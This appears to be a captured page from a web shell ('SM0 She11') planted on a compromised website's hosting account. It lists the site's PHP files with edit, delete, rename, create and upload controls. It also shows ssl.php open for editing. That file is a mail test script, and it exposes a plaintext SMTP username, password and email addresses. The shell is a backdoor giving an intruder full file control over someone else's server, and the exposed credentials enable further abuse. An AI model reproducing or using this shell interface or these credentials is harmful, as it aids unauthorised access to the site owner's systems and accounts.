SM0 She11
Path:
/
/
home
/
saienerg
/
public_html
Full Path (server): /home/saienerg/public_html
Create Fil3
Upl04d Fil3
📄 .DS_Store
[E]
[D]
[R]
📄 .ftpquota
[E]
[D]
[R]
📄 .htaccess
[E]
[D]
[R]
📄 .htaccessold
[E]
[D]
[R]
📄 .user.ini
[E]
[D]
[R]
📁 SpryAssets
Open
[D]
[R]
📄 about-ramesh.php
[E]
[D]
[R]
📄 about-sivakumar.php
[E]
[D]
[R]
📄 about-thangaraju.php
[E]
[D]
[R]
📄 about-venkat.php
[E]
[D]
[R]
📄 aboutus.php
[E]
[D]
[R]
📄 affected.zip
[E]
[D]
[R]
📄 careercopy.php
[E]
[D]
[R]
📄 careerpost.php
[E]
[D]
[R]
📄 careers.php
[E]
[D]
[R]
📄 careersapplynow.php
[E]
[D]
[R]
📄 careerslocation.php
[E]
[D]
[R]
📄 cat-photo.php
[E]
[D]
[R]
📄 class.phpmailer.php
[E]
[D]
[R]
📄 class.smtp.php
[E]
[D]
[R]
📄 clients.php
[E]
[D]
[R]
📄 cmn_lib.php
[E]
[D]
[R]
📄 contactus.php
[E]
[D]
[R]
📁 css
Open
[D]
[R]
📁 demo
Open
[D]
[R]
📄 enquiry-omservice.php
[E]
[D]
[R]
📄 enquiry-otherservice.php
[E]
[D]
[R]
📁 enquiryupload
Open
[D]
[R]
📄 error_log
[E]
[D]
[R]
📄 event-details.php
[E]
[D]
[R]
📄 eventslist.php
[E]
[D]
[R]
📁 fonts
Open
[D]
[R]
📄 gallery-album.php
[E]
[D]
[R]
📄 gallery-photo.php
[E]
[D]
[R]
📄 gallery-video.php
[E]
[D]
[R]
📄 google11bb5e94a094932d.html
[E]
[D]
[R]
📁 images
Open
[D]
[R]
📁 img
Open
[D]
[R]
📁 include
Open
[D]
[R]
📄 index.html
[E]
[D]
[R]
📄 index.php
[E]
[D]
[R]
📄 index1.php
[E]
[D]
[R]
📁 intra
Open
[D]
[R]
📁 js
Open
[D]
[R]
📄 mail.php
[E]
[D]
[R]
📄 peformance_archives.php
[E]
[D]
[R]
📄 per-articles.php
[E]
[D]
[R]
📄 per-experiencelist-pre-OEM.php
[E]
[D]
[R]
📄 per-experiencelist-pre-direct.php
[E]
[D]
[R]
📄 per-experiencelist-services-dis.php
[E]
[D]
[R]
📄 per-experiencelist-services-energy.php
[E]
[D]
[R]
📄 per-experiencelist-services-special.php
[E]
[D]
[R]
📄 per-experiencelist-services-trou.php
[E]
[D]
[R]
📄 per-experiencelist.php
[E]
[D]
[R]
📄 per-listofcurrent.php
[E]
[D]
[R]
📄 per-monthlyperform.php
[E]
[D]
[R]
📄 per-servicecap.php
[E]
[D]
[R]
📄 php.ini
[E]
[D]
[R]
📄 products-details.php
[E]
[D]
[R]
📄 products-details1.php
[E]
[D]
[R]
📄 products.php
[E]
[D]
[R]
📄 products1.php
[E]
[D]
[R]
📄 products_old.php
[E]
[D]
[R]
📄 service.php
[E]
[D]
[R]
📄 site.js
[E]
[D]
[R]
📄 site.php
[E]
[D]
[R]
📄 ssl.php
[E]
[D]
[R]
📄 testmail.php
[E]
[D]
[R]
📄 top-footertop.php
[E]
[D]
[R]
📄 top-side-serviceslist.php
[E]
[D]
[R]
Editing: ssl.php
<?php function is_ssl() { if ( isset($_SERVER['HTTPS']) ) { if ( 'on' == strtolower($_SERVER['HTTPS']) ) echo '1'; return true; if ( '1' == $_SERVER['HTTPS'] ) return true; echo '2'; } elseif ( isset($_SERVER['SERVER_PORT']) && ( '443' == $_SERVER['SERVER_PORT'] ) ) { return true; echo '1'; } return false; } echo is_ssl(); if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') { echo 'asdasdsf'; }else{ echo 'no'; } include("intra/spel_config.php"); include("intra/cmn_lib.php"); $obj = new glibrary(); require("class.phpmailer.php"); $mail = new PHPMailer(); $mail -> CharSet = "UTF-8"; $mail->IsSMTP(); /*$mail->Host = "relay-hosting.secureserver.net'"; $mail->SMTPAuth = true; //$mail->SMTPSecure = 'tls'; $mail->Port = 465; $mail->CharSet = "UTF-8";*/ $mail->Host = "relay-hosting.secureserver.net"; $mail->Port = 25; $mail->SMTPDebug = 0; $mail->SMTPSecure = "none"; $mail->SMTPAuth = false; $mail->Username = "saitesting@absxpintranet.in"; $mail->Password = "IG5g}*TJsL4q"; //$mail->Username = "saitesting@absxpintranet.in"; //$mail->Password = "IG5g}*TJsL4q"; $mail->Subject = "Subject Text"; $mail->From = "saitesting@absxpintranet.in"; $mail->FromName = "Sai Talent Acquisition Team"; $mail->addAddress("adtest99@gmail.com"); $mail->Body = "hashdf "; //$mail->addAddress("$aplnt_eml", "$aplnt_nme"); $mail->addAddress("adtest99@gmail.com"); if(!$mail->send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message has been sent successfully"; } /*define('SMTP_HOST','relay-hosting.secureserver.net'); define('SMTP_PORT',25); define('SMTP_USERNAME','saitesting@absxpintranet.in'); define('SMTP_PASSWORD','IG5g}*TJsL4q'); define('SMTP_AUTH',false); $email = 'adtest99@gmail.com'; $firstName = 'Aravind'; $mail = new PHPMailerR(); $mail->IsSMTP(); $mail->SMTPDebug = 1; $mail->SMTPAuth = SMTP_AUTH; $mail->Host = SMTP_HOST; $mail->Port = 25; $mail->Username = SMTP_USERNAME; $mail->Password = SMTP_PASSWORD; $mail->SetFrom(SMTP_USERNAME,'AravindNC.IN'); $mail->AddReplyTo(SMTP_USERNAME,"AravindNC.IN"); $mail->Subject = "Welcome to AravindNC.IN"; $mail->AltBody = "To view the message, please use an HTML compatible email viewer!"; $mail->MsgHTML('This is a test.'); $mail->AddAddress($email, 'Aravind NC'); $mail->Send(); */?>
Save